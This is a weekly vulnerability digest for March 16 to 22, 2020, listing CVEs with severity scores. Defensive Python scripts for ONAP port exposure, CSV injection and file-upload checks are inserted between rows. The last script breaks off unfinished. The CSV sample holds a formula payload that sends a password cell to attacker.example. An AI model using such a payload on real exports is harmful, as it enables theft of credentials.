Weekly Vulnerabilities Reports > March 16 to 22, 2020

Overview

358 new vulnerabilities were reported during this period, including 29 critical and 56 high severity vulnerabilities. This weekly summary covers vulnerabilities in 349 products from 156 vendors, including Onap, Redhat, Cpanel, Netsas, and Frappe. The most common weakness categories are "Cross-site Scripting", "Improper Input Validation", "SQL Injection", "Improper Privilege Management", and "OS Command Injection".

  • 314 reported vulnerabilities are remotely exploitable.
  • 1 reported vulnerability has a public exploit available.
  • 155 reported vulnerabilities are related to weaknesses in the OWASP Top Ten.
  • 258 reported vulnerabilities are exploitable by an anonymous user.
  • Onap has the most reported vulnerabilities, with 21.
  • Trendmicro has the most reported critical vulnerabilities, with 3.

Vulnerability Details

The following tables list the reported vulnerabilities for the period covered by this report:

29 Critical Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2020-03-20 CVE-2019-19148 Tellabs OS Command Injection vulnerability in Tellabs Optical Line Terminal 1150 Firmware Ont709.2.50.12

Tellabs Optical Line Terminal (OLT) 1150 devices allow Remote Command Execution via the -l option to TELNET or SSH.

10.0
2020-03-20 CVE-2018-20334 Asus OS Command Injection vulnerability in Asus Asuswrt 3.0.0.4.384.20308

An issue was discovered in ASUSWRT 3.0.0.4.384.20308.

10.0
2020-03-20 CVE-2019-16072 Netsas OS Command Injection vulnerability in Netsas Enigma Network Management Solution

An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.

10.0
2020-03-19 CVE-2019-12130 Onap Missing Authentication FOR Critical Function vulnerability in Onap Open Network Automation Platform

In ONAP CLI through Dublin, by accessing an applicable port (30234, 30290, 32010, 30270, 30224, 30281, 30254, 30285, and/or 30271), an attacker gains full access to the respective ONAP services without any authentication.

10.0
2020-03-19 CVE-2019-12129 Onap Missing Authentication FOR Critical Function vulnerability in Onap Open Network Automation Platform

In ONAP MSB through Dublin, by accessing an applicable port (30234, 30290, 32010, 30270, 30224, 30281, 30254, 30285, and/or 30271), an attacker gains full access to the respective ONAP services without any authentication.

10.0
2020-03-19 CVE-2019-12128 Onap Missing Authentication FOR Critical Function vulnerability in Onap Open Network Automation Platform

In ONAP SO through Dublin, by accessing an applicable port (30234, 30290, 32010, 30270, 30224, 30281, 30254, 30285, and/or 30271), an attacker gains full access to the respective ONAP services without any authentication.

10.0
2020-03-18 CVE-2020-9423 Logicaldoc Unrestricted Upload of File With Dangerous Type vulnerability in Logicaldoc

LogicalDoc before 8.3.3 could allow an attacker to upload arbitrary files, leading to command execution or retrieval of data from the database.

10.0
2020-03-18 CVE-2020-8599 Trendmicro Unrestricted Upload of File With Dangerous Type vulnerability in Trendmicro Apex ONE and Officescan

Trend Micro Apex One (2019) and OfficeScan XG server contain a vulnerable EXE file that could allow a remote attacker to write arbitrary data to an arbitrary path on affected installations and bypass ROOT login.

10.0
2020-03-18 CVE-2020-8598 Trendmicro Improper Input Validation vulnerability in Trendmicro Apex One, Officescan and Worry-Free Business Security

Trend Micro Apex One (2019), OfficeScan XG and Worry-Free Business Security (9.0, 9.5, 10.0) server contains a vulnerable service DLL file that could allow a remote attacker to execute arbitrary code on affected installations with SYSTEM level privileges.

10.0
2020-03-16 CVE-2020-5847 Unraid Code Injection vulnerability in Unraid 6.8.0

Unraid through 6.8.0 allows Remote Code Execution.

10.0
2020-03-16 CVE-2020-6990 Rockwellautomation USE of Hard-Coded Credentials vulnerability in Rockwellautomation products

In Rockwell Automation MicroLogix 1400 Controllers Series B v21.001 and prior, MicroLogix 1400 Controllers Series A (all versions), MicroLogix 1100 Controllers (all versions), and RSLogix 500 Software v12.001 and prior, the cryptographic key used to help protect the account password is hard-coded into the RSLogix 500 binary file.

10.0
2020-03-18 CVE-2020-8470 Trendmicro Improper Input Validation vulnerability in Trendmicro Apex One, Officescan and Worry-Free Business Security

Trend Micro Apex One (2019), OfficeScan XG and Worry-Free Business Security (9.0, 9.5, 10.0) server contains a vulnerable service DLL file that could allow an attacker to delete any file on the server with SYSTEM level privileges.

9.4
2020-03-18 CVE-2019-19676 Arxes Tolina Unspecified vulnerability in Arxes-Tolina 3.0.0

A CSV injection in arxes-tolina 3.0.0 allows malicious users to gain remote control of other computers.

9.3
2020-03-18 CVE-2019-11689 Asustor OS Command Injection vulnerability in Asustor Exfat Driver 1.0.0

An issue was discovered in ASUSTOR exFAT Driver through 1.0.0.r20.

9.3
2020-03-22 CVE-2020-10808 Vestacp OS Command Injection vulnerability in Vestacp Vesta Control Panel

Vesta Control Panel (VestaCP) through 0.9.8-26 allows Command Injection via the schedule/backup Backup Listing Endpoint.

9.0
2020-03-20 CVE-2019-15665 Killernetworking Out-Of-Bounds Write vulnerability in Killernetworking Killer Control Center

An issue was discovered in Rivet Killer Control Center before 2.1.1352.

9.0
2020-03-20 CVE-2019-15661 Killernetworking Out-Of-Bounds Write vulnerability in Killernetworking Killer Control Center

An issue was discovered in Rivet Killer Control Center before 2.1.1352.

9.0
2020-03-19 CVE-2019-16066 Netsas Unrestricted Upload of File With Dangerous Type vulnerability in Netsas Enigma Network Management Solution

An unrestricted file upload vulnerability exists in user and system file upload functions in NETSAS Enigma NMS 65.0.0 and prior.

9.0
2020-03-19 CVE-2019-16065 Netsas SQL Injection vulnerability in Netsas Enigma Network Management Solution

A remote SQL injection web vulnerability was discovered in the Enigma NMS 65.0.0 and prior web application that allows an attacker to execute SQL commands to expose and compromise the web server, expose database tables and values, and potentially execute system-based commands as the mysql user.

9.0
2020-03-19 CVE-2014-2723 Fortinet Incorrect Default Permissions vulnerability in Fortinet products

In FortiBalancer 400, 1000, 2000 and 3000, a platform-specific remote access vulnerability has been discovered that may allow a remote user to gain privileged access to affected systems using SSH.

9.0
2020-03-19 CVE-2014-2722 Fortinet Incorrect Default Permissions vulnerability in Fortinet products

In FortiBalancer 400, 1000, 2000 and 3000, a platform-specific remote access vulnerability has been discovered that may allow a remote user to gain privileged access to affected systems using SSH.

9.0
2020-03-19 CVE-2014-2721 Fortinet Incorrect Default Permissions vulnerability in Fortinet products

In FortiBalancer 400, 1000, 2000 and 3000, a platform-specific remote access vulnerability has been discovered that may allow a remote user to gain privileged access to affected systems using SSH.

9.0
2020-03-18 CVE-2019-18582 Dell Code Injection vulnerability in Dell products

Dell EMC Data Protection Advisor versions 6.3, 6.4, 6.5, 18.2 versions prior to patch 83, and 19.1 versions prior to patch 71 contain a server-side template injection vulnerability in the REST API.

9.0
2020-03-18 CVE-2019-18581 Dell Missing Authorization vulnerability in Dell products

Dell EMC Data Protection Advisor versions 6.3, 6.4, 6.5, 18.2 versions prior to patch 83, and 19.1 versions prior to patch 71 contain a server missing authorization vulnerability in the REST API.

9.0
2020-03-17 CVE-2020-10120 Cpanel Incorrect Authorization vulnerability in Cpanel

cPanel before 84.0.20 allows resellers to achieve remote code execution as root via a cpsrvd rsync shell (SEC-545).

9.0
2020-03-17 CVE-2020-10115 Cpanel Improper Input Validation vulnerability in Cpanel

cPanel before 84.0.20, when PowerDNS is used, allows arbitrary code execution as root via dnsadmin.

9.0
2020-03-17 CVE-2019-11074 Paessler Unrestricted Upload of File With Dangerous Type vulnerability in Paessler Network Monitor

A Write to Arbitrary Location in Disk vulnerability exists in PRTG Network Monitor 19.1.49 and below that allows attackers to place files in arbitrary locations with SYSTEM privileges (although not controlling the contents of such files) due to insufficient sanitisation when passing arguments to the phantomjs.exe binary.

9.0
2020-03-16 CVE-2019-11073 Paessler Injection vulnerability in Paessler Prtg Network Monitor

A Remote Code Execution vulnerability exists in PRTG Network Monitor before 19.4.54.1506 that allows attackers to execute code due to insufficient sanitization when passing arguments to the HttpTransactionSensor.exe binary.

9.0
2020-03-16 CVE-2019-19940 Swisscom OS Command Injection vulnerability in Swisscom Centro Grande Firmware 6.12.02/6.14.00

Incorrect input sanitization in text-oriented user interfaces (telnet, ssh) in Swisscom Centro Grande before 6.16.12 allows remote authenticated users to execute arbitrary commands via command injection.

9.0

56 High Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2020-03-18 CVE-2019-11688 Asustor Improper Certificate Validation vulnerability in Asustor Exfat Driver 1.0.0

An issue was discovered in ASUSTOR exFAT Driver through 1.0.0.r20.

8.8
2020-03-19 CVE-2019-16012 Cisco SQL Injection vulnerability in Cisco Sd-Wan Firmware

A vulnerability in the web UI of Cisco SD-WAN Solution vManage software could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system.

8.5
2020-03-20 CVE-2018-20335 Asus Improper Input Validation vulnerability in Asus Asuswrt 3.0.0.4.384.20308

An issue was discovered in ASUSWRT 3.0.0.4.384.20308.

7.8
2020-03-16 CVE-2020-7919 Golang, Debian, Fedoraproject, Netapp Improper Certificate Validation vulnerability in multiple products

Go before 1.12.16 and 1.13.x before 1.13.7 (and the crypto/cryptobyte package before 0.0.0-20200124225646-8b5121be2f68 for Go) allows attacks on clients (resulting in a panic) via a malformed X.509 certificate.

7.8
2020-03-22 CVE-2020-10806 EZ Unrestricted Upload of File With Dangerous Type vulnerability in EZ Publish-Kernel and EZ Publish-Legacy

eZ Publish Kernel before 5.4.14.1, 6.x before 6.13.6.2, and 7.x before 7.5.6.2 and eZ Publish Legacy before 5.4.14.1, 2017 before 2017.12.7.2, and 2019 before 2019.03.4.2 allow remote attackers to execute arbitrary code by uploading PHP code, unless the vhost configuration permits only app.php execution.

7.5
2020-03-21 CVE-2019-12767 Dlink OS Command Injection vulnerability in Dlink Dap-1650 Firmware

An issue was discovered on D-Link DAP-1650 devices before 1.04B02_J65H Hot Fix.

7.5
2020-03-20 CVE-2020-10799 Svglib Project XXE vulnerability in Svglib Project Svglib

The svglib package through 0.9.3 for Python allows XXE attacks via an svg2rlg call.

7.5
2020-03-20 CVE-2019-11574 Simplemachines Server-Side Request Forgery (SSRF) vulnerability in Simplemachines Simple Machine Forum

An issue was discovered in Simple Machines Forum (SMF) before release 2.0.17.

7.5
2020-03-20 CVE-2019-18641 Sparkdevnetwork Unspecified vulnerability in Sparkdevnetwork Rock RMS

Rock RMS before 1.8.6 mishandles vCard access control within the People/GetVCard/REST controller.

7.5
2020-03-20 CVE-2019-15522 Linbit Unspecified vulnerability in Linbit Csync2 1.34/2.0

An issue was discovered in LINBIT csync2 through 2.0.

7.5
2020-03-20 CVE-2020-8137 Blamer Project Code Injection vulnerability in Blamer Project Blamer

Code injection vulnerability in blamer 1.0.0 and earlier may result in remote code execution when the input can be controlled by an attacker.

7.5
2020-03-20 CVE-2020-8135 Uppy Server-Side Request Forgery (SSRF) vulnerability in Uppy 1.9.1/1.9.2

The uppy npm package before 1.9.3 is vulnerable to Server-Side Request Forgery (SSRF), which allows an attacker to scan the local or an external network or otherwise interact with internal systems.

7.5
2020-03-20 CVE-2020-7961 Liferay Deserialization of Untrusted Data vulnerability in Liferay Portal

Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).

7.5
2020-03-20 CVE-2019-12498 3CX Missing Authorization vulnerability in 3CX Wp-Live Chat

The WP Live Chat Support plugin before 8.0.33 for WordPress accepts certain REST API calls without invoking the wplc_api_permission_check protection mechanism.

7.5
2020-03-19 CVE-2019-12127 Onap Missing Authentication for Critical Function vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

In ONAP OOM through Dublin, by accessing an applicable port (30234, 30290, 32010, 30270, 30224, 30281, 30254, 30285, and/or 30271), an attacker gains full access to the respective ONAP services without any authentication.

7.5
2020-03-19 CVE-2019-12126 Onap Missing Authentication for Critical Function vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

In ONAP DCAE through Dublin, by accessing an applicable port (30234, 30290, 32010, 30270, 30224, 30281, 30254, 30285, and/or 30271), an attacker gains full access to the respective ONAP services without any authentication.

7.5
2020-03-19 CVE-2019-12125 Onap Missing Authentication for Critical Function vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

In ONAP Logging through Dublin, by accessing an applicable port (30234, 30290, 32010, 30270, 30224, 30281, 30254, 30285, and/or 30271), an attacker gains full access to the respective ONAP services without any authentication.

7.5
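The ONAP entries above (CVE-2019-12125 through CVE-2019-12130, in both the critical and high tables) all reduce to the same exposure: a fixed set of Kubernetes NodePorts that answer without authentication. The following Python script is an added example, not ONAP project code: it reads the output of `kubectl get svc -A -o json` and flags any NodePort or LoadBalancer service published on one of the advisory's ports. The service list embedded in it is constructed for the example and its service names are hypothetical; only the port numbers come from the advisory text.

```python
import json
from typing import Dict, List, Set

# NodePorts named in the ONAP advisories (CVE-2019-12125 through CVE-2019-12130).
ONAP_UNAUTHENTICATED_NODEPORTS: Set[int] = {
    30234, 30290, 32010, 30270, 30224, 30281, 30254, 30285, 30271,
}

# Constructed sample standing in for `kubectl get svc -A -o json`. The service
# names are hypothetical; only the nodePort values are taken from the advisory.
SAMPLE_SERVICE_LIST = json.dumps({
    "kind": "List",
    "items": [
        {"metadata": {"name": "so-monitoring", "namespace": "onap"},
         "spec": {"type": "NodePort",
                  "ports": [{"port": 9091, "targetPort": 9091, "nodePort": 30224}]}},
        {"metadata": {"name": "dcae-healthcheck", "namespace": "onap"},
         "spec": {"type": "NodePort",
                  "ports": [{"port": 80, "targetPort": 8080, "nodePort": 30270}]}},
        {"metadata": {"name": "portal-app", "namespace": "onap"},
         "spec": {"type": "NodePort",
                  "ports": [{"port": 8989, "targetPort": 8080, "nodePort": 30215}]}},
        {"metadata": {"name": "aai-resources", "namespace": "onap"},
         "spec": {"type": "ClusterIP",
                  "ports": [{"port": 8447, "targetPort": 8447}]}},
    ],
})


def find_exposed_onap_services(kubectl_json: str,
                               watch: Set[int] = ONAP_UNAUTHENTICATED_NODEPORTS) -> List[Dict[str, object]]:
    """Return every NodePort/LoadBalancer service whose nodePort is on the advisory list.

    Only the Service objects are inspected; whether the port really answers
    unauthenticated requests still has to be confirmed against the running release.
    """
    doc = json.loads(kubectl_json)
    hits: List[Dict[str, object]] = []
    for item in doc.get("items", []):
        spec = item.get("spec", {})
        # ClusterIP services are not reachable from outside the cluster network.
        if spec.get("type") not in ("NodePort", "LoadBalancer"):
            continue
        meta = item.get("metadata", {})
        for port in spec.get("ports", []):
            node_port = port.get("nodePort")
            if node_port in watch:
                hits.append({
                    "namespace": meta.get("namespace"),
                    "service": meta.get("name"),
                    "nodePort": node_port,
                    "targetPort": port.get("targetPort", port.get("port")),
                })
    return sorted(hits, key=lambda h: h["nodePort"])


def format_report(hits: List[Dict[str, object]]) -> str:
    """One line per exposed service, or a short all-clear message."""
    if not hits:
        return "no services on the advisory NodePort list"
    lines = ["namespace/service -> nodePort (targetPort)"]
    for h in hits:
        lines.append(f"{h['namespace']}/{h['service']} -> {h['nodePort']} ({h['targetPort']})")
    return "\n".join(lines)


if __name__ == "__main__":
    import sys
    # `python3 check_onap_ports.py -` reads real kubectl output from stdin;
    # with no argument the constructed sample is used.
    raw = sys.stdin.read() if len(sys.argv) > 1 and sys.argv[1] == "-" else SAMPLE_SERVICE_LIST
    print(format_report(find_exposed_onap_services(raw)))
```

A hit means the port is published on every node, not yet that the service behind it is the unauthenticated one, so confirm it against the running release. Until the fix is applied, the practical mitigation is to keep the NodePort range off any untrusted network with a firewall rule or NetworkPolicy.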
2020-03-19 CVE-2019-16382 Ivanti Unspecified vulnerability in Ivanti Workspace Control 10.3.110.0

An issue was discovered in Ivanti Workspace Control 10.3.110.0.

7.5
2020-03-18 CVE-2020-10674 Perlspeak Project OS Command Injection vulnerability in Perlspeak Project Perlspeak

PerlSpeak through 2.01 allows attackers to execute arbitrary OS commands, as demonstrated by use of system and 2-argument open.

7.5
2020-03-18 CVE-2019-12132 Onap OS Command Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDNC before Dublin.

7.5
2020-03-18 CVE-2019-12120 Onap Code Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP VNFSDK through Dublin.

7.5
2020-03-18 CVE-2019-12119 Onap Code Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDC through Dublin.

7.5
2020-03-18 CVE-2019-12118 Onap Code Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDC through Dublin.

7.5
2020-03-18 CVE-2019-12117 Onap Code Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDC through Dublin.

7.5
2020-03-18 CVE-2019-12116 Onap Code Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDC through Dublin.

7.5
2020-03-18 CVE-2019-12115 Onap Code Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDC through Dublin.

7.5
2020-03-18 CVE-2019-12114 Onap Code Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP HOLMES before Dublin.

7.5
2020-03-18 CVE-2019-12112 Onap OS Command Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDNC before Dublin.

7.5
2020-03-18 CVE-2020-3922 Armorx SQL Injection vulnerability in Armorx Lisomail

LisoMail, by ArmorX, allows SQL injection: attackers can access the database without authentication via URL parameter manipulation.

7.5
2020-03-18 CVE-2020-8600 Trendmicro Path Traversal vulnerability in Trendmicro Worry-Free Business Security 10.0/9.0/9.5

Trend Micro Worry-Free Business Security (9.0, 9.5, 10.0) is affected by a directory traversal vulnerability that could allow an attacker to manipulate a key file to bypass authentication.

7.5
2020-03-17 CVE-2020-10121 Cpanel Unspecified vulnerability in Cpanel

cPanel before 84.0.20 allows a demo account to achieve code execution via PassengerApps APIs (SEC-546).

7.5
2020-03-17 CVE-2020-10119 Cpanel Unspecified vulnerability in Cpanel

cPanel before 84.0.20 allows a demo account to achieve remote code execution via a cpsrvd rsync shell (SEC-544).

7.5
2020-03-17 CVE-2019-20498 Cpanel Unspecified vulnerability in Cpanel

cPanel before 82.0.18 allows WebDAV authentication bypass because the connection-sharing logic is incorrect (SEC-534).

7.5
2020-03-17 CVE-2020-10380 R Consortium SQL Injection vulnerability in R-Consortium Rmysql

RMySQL through 0.10.19 allows SQL Injection.

7.5
2020-03-16 CVE-2020-9347 Zohocorp Injection vulnerability in Zohocorp Manageengine Password Manager PRO

** DISPUTED ** Zoho ManageEngine Password Manager Pro through 10.x has a CSV Excel Macro Injection vulnerability via a crafted name that is mishandled by the Export Passwords feature.

7.5
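Both CSV-injection entries above (arxes-tolina, CVE-2019-19676, and the disputed ManageEngine Password Manager Pro export, CVE-2020-9347) come down to an export that writes attacker-chosen text into a cell that a spreadsheet will later evaluate. The Python below is an added example, not code from either vendor: it shows the verbatim export beside one that neutralizes formula-leading cells in the way OWASP recommends. The password rows it exports are constructed for the example.

```python
import csv
import io
from typing import Iterable, Sequence

# A leading one of these makes a spreadsheet evaluate the cell as a formula when
# the CSV is opened. Tab and carriage return are included because some Excel
# versions treat them as formula starts too; '|' appears in the classic DDE payloads.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "|")


def neutralize_cell(value: object) -> str:
    """Return the cell text, prefixed with a quote if a spreadsheet would treat it as a formula.

    Real numbers pass through unchanged: "-42" produced from an int is a number,
    not a formula, and escaping it would break arithmetic in the sheet.
    """
    if value is None:
        return ""
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    text = str(value)
    # Look past leading spaces so " =1+1" is caught as well.
    if text.lstrip(" ").startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_rows_unsafe(headers: Sequence[object], rows: Iterable[Sequence[object]]) -> str:
    """The failing pattern behind both entries: cell values written verbatim."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(headers)
    for row in rows:
        writer.writerow(row)
    return buf.getvalue()


def export_rows(headers: Sequence[object], rows: Iterable[Sequence[object]]) -> str:
    """Hardened export: every cell neutralized and every field quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow([neutralize_cell(h) for h in headers])
    for row in rows:
        writer.writerow([neutralize_cell(c) for c in row])
    return buf.getvalue()


# Constructed sample: a password-manager export where one entry name is a payload
# that would exfiltrate the neighbouring password cell when the sheet is opened.
SAMPLE_HEADERS = ["name", "username", "password"]
SAMPLE_ROWS = [
    ["Mail server", "alice", "hunter2"],
    ['=HYPERLINK("http://attacker.example/?x="&C2,"open")', "bob", "-not-a-formula"],
]

if __name__ == "__main__":
    print(export_rows_unsafe(SAMPLE_HEADERS, SAMPLE_ROWS))
    print(export_rows(SAMPLE_HEADERS, SAMPLE_ROWS))
```

The quote prefix survives into the sheet as a visible character, which is the accepted trade-off; the alternative of stripping the trigger characters silently alters user data. Numeric columns are exempted by type, not by text, so a string that merely looks like a negative number is still escaped.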
2020-03-16 CVE-2020-8786 Salesagility SQL Injection vulnerability in Salesagility Suitecrm

SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow SQL Injection (issue 4 of 4).

7.5
2020-03-16 CVE-2020-8785 Salesagility SQL Injection vulnerability in Salesagility Suitecrm

SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow SQL Injection (issue 3 of 4).

7.5
2020-03-16 CVE-2020-8784 Salesagility SQL Injection vulnerability in Salesagility Suitecrm

SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow SQL Injection (issue 2 of 4).

7.5
2020-03-16 CVE-2020-8783 Salesagility SQL Injection vulnerability in Salesagility Suitecrm

SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow SQL Injection (issue 1 of 4).

7.5
2020-03-16 CVE-2019-19212 Dolibarr Cross-Site Scripting vulnerability in Dolibarr

Dolibarr ERP/CRM 3.0 through 10.0.3 allows XSS via the qty parameter to product/fournisseurs.php (product price screen).

7.5
2020-03-16 CVE-2020-10243 Joomla SQL Injection vulnerability in Joomla Joomla!

An issue was discovered in Joomla! before 3.9.16.

7.5
2020-03-16 CVE-2020-10230 Centos Webpanel SQL Injection vulnerability in Centos-Webpanel Centos web Panel

CentOS-WebPanel.com (aka CWP) CentOS Web Panel (for CentOS 6 and 7) allows SQL Injection via the /cwp_{SESSION_HASH}/admin/loader_ajax.php term parameter.

7.5
2020-03-16 CVE-2019-19208 Codiad Code Injection vulnerability in Codiad

Codiad Web IDE through 2.8.4 allows PHP Code injection.

7.5
2020-03-16 CVE-2020-5547 Mitsubishielectric Improper Input Validation vulnerability in Mitsubishielectric Iu1-1M20-D Firmware

Resource Management Errors vulnerability in TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier allows remote attackers to stop the network functions or execute malware via a specially crafted packet.

7.5
2020-03-16 CVE-2020-5545 Mitsubishielectric Unspecified vulnerability in Mitsubishielectric Iu1-1M20-D Firmware

TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier allows remote attackers to bypass access restriction and to stop the network functions or execute malware via a specially crafted packet.

7.5
2020-03-16 CVE-2020-5544 Mitsubishielectric Null Pointer Dereference vulnerability in Mitsubishielectric Iu1-1M20-D Firmware

Null Pointer Dereference vulnerability in TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier allows remote attackers to stop the network functions or execute malware via a specially crafted packet.

7.5
2020-03-16 CVE-2020-5543 Mitsubishielectric Session Fixation vulnerability in Mitsubishielectric Iu1-1M20-D Firmware

TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier does not properly manage sessions, which allows remote attackers to stop the network functions or execute malware via a specially crafted packet.

7.5
2020-03-16 CVE-2020-5542 Mitsubishielectric Improper Restriction of Operations Within the Bounds of A Memory Buffer vulnerability in Mitsubishielectric Iu1-1M20-D Firmware

Buffer error vulnerability in TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier allows remote attackers to stop the network functions or execute malware via a specially crafted packet.

7.5
2020-03-20 CVE-2019-16258 Homee Missing Authentication FOR Critical Function vulnerability in Homee Brain Cube Firmware

The bootloader of the homee Brain Cube V2 through 2.23.0 allows attackers with physical access to gain root access by manipulating the U-Boot environment via the CLI after connecting to the internal UART interface.

7.2
2020-03-19 CVE-2020-3266 Cisco OS Command Injection vulnerability in Cisco Sd-Wan Firmware

A vulnerability in the CLI of Cisco SD-WAN Solution software could allow an authenticated, local attacker to inject arbitrary commands that are executed with root privileges.

7.2
2020-03-19 CVE-2020-3265 Cisco Improper Privilege Management vulnerability in Cisco Sd-Wan Firmware

A vulnerability in Cisco SD-WAN Solution software could allow an authenticated, local attacker to elevate privileges to root on the underlying operating system.

7.2
2020-03-18 CVE-2020-10665 Docker Improper Privilege Management vulnerability in Docker Desktop

Docker Desktop allows local privilege escalation to NT AUTHORITY\SYSTEM because it mishandles the collection of diagnostics with Administrator privileges, leading to arbitrary DACL permissions overwrites and arbitrary file writes.

7.2
2020-03-17 CVE-2020-3950 Vmware Improper Privilege Management vulnerability in VMWare Fusion, Horizon Client and Remote Console

VMware Fusion (11.x before 11.5.2), VMware Remote Console for Mac (11.x and prior before 11.0.1) and Horizon Client for Mac (5.x and prior before 5.4.0) contain a privilege escalation vulnerability due to improper use of setuid binaries.

7.2
2020-03-16 CVE-2020-3947 Vmware USE After Free vulnerability in VMWare Fusion and Workstation

VMware Workstation (15.x before 15.5.2) and Fusion (11.x before 11.5.2) contain a use-after-free vulnerability in vmnetdhcp.

7.2
2020-03-16 CVE-2019-5543 Vmware, Microsoft Incorrect Permission Assignment for Critical Resource vulnerability in VMWare Horizon Client, Remote Console and Workstation

For VMware Horizon Client for Windows (5.x and prior before 5.3.0), VMware Remote Console for Windows (10.x before 11.0.0), VMware Workstation for Windows (15.x before 15.5.2) the folder containing configuration files for the VMware USB arbitration service was found to be writable by all users.

7.2
2020-03-20 CVE-2020-10558 Tesla Improper Privilege Management vulnerability in Tesla Model 3 web Interface

The driving interface of Tesla Model 3 vehicles in any release before 2020.4.10 allows Denial of Service to occur due to improper process separation, which allows attackers to disable the speedometer, web browser, climate controls, turn signal visual and sounds, navigation, autopilot notifications, along with other miscellaneous functions from the main screen.

7.1

228 Medium Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2020-03-21 CVE-2020-10800 LIX Project Authorization Bypass Through User-Controlled KEY vulnerability in LIX Project LIX

lix through 15.8.7 allows man-in-the-middle attackers to execute arbitrary code by modifying the HTTP client-server data stream so that the Location header is associated with attacker-controlled executable content in the postDownload field.

6.8
2020-03-21 CVE-2013-7487 Swann Injection vulnerability in Swann products

On Swann DVR04B, DVR08B, DVR-16CIF, and DVR16B devices, raysharpdvr application has a vulnerable call to “system”, which allows remote attackers to execute arbitrary code via TCP port 9000.

6.8
2020-03-20 CVE-2020-8882 Foxitsoftware Access of Uninitialized Pointer vulnerability in Foxitsoftware Foxit Studio Photo

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.916.

6.8
2020-03-20 CVE-2020-8881 Foxitsoftware USE After Free vulnerability in Foxitsoftware Foxit Studio Photo

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.916.

6.8
2020-03-20 CVE-2020-8880 Foxitsoftware Out-Of-Bounds Read vulnerability in Foxitsoftware Foxit Studio Photo

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.916.

6.8
2020-03-20 CVE-2020-8878 Foxitsoftware Out-Of-Bounds Write vulnerability in Foxitsoftware Foxit Studio Photo

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.916.

6.8
2020-03-20 CVE-2020-1864 Huawei Improper Authentication vulnerability in Huawei Secospace Antiddos8000 Firmware

Some Huawei products have a security vulnerability due to improper authentication.

6.8
2020-03-20 CVE-2020-10682 Cmsmadesimple Unrestricted Upload of File With Dangerous Type vulnerability in Cmsmadesimple CMS Made Simple 2.2.13

The Filemanager in CMS Made Simple 2.2.13 allows remote code execution via a .php.jpegd JPEG file, as demonstrated by m1_files[] to admin/moduleinterface.php.

6.8
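The CMS Made Simple entry above (a .php.jpegd upload), together with the earlier LogicalDoc, NETSAS (CVE-2019-16066) and eZ Publish upload entries, illustrates the standard failure: the application judges a file by its last extension while the web server may execute it on the strength of any extension in the name. The Python below is an added example and not code from any of those projects; it puts the naive last-extension denylist next to a check that requires a single allowlisted extension, matching magic bytes and a server-chosen storage name. The JPEG and PHP byte strings are constructed for the example.

```python
import os
import secrets
from typing import Optional

# Allowlist: extension -> required leading bytes. Nothing else is accepted.
ALLOWED_IMAGE_TYPES = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# Extensions a web server may hand to an interpreter. Used only by the naive
# check to show why a denylist on the last extension is not enough.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar",
                         "cgi", "pl", "jsp", "asp", "aspx"}

# Constructed sample contents.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16   # JPEG/JFIF header
PHP_SAMPLE = b"<?php echo 'hello'; ?>"                               # PHP source, not an image


def naive_is_allowed(filename: str) -> bool:
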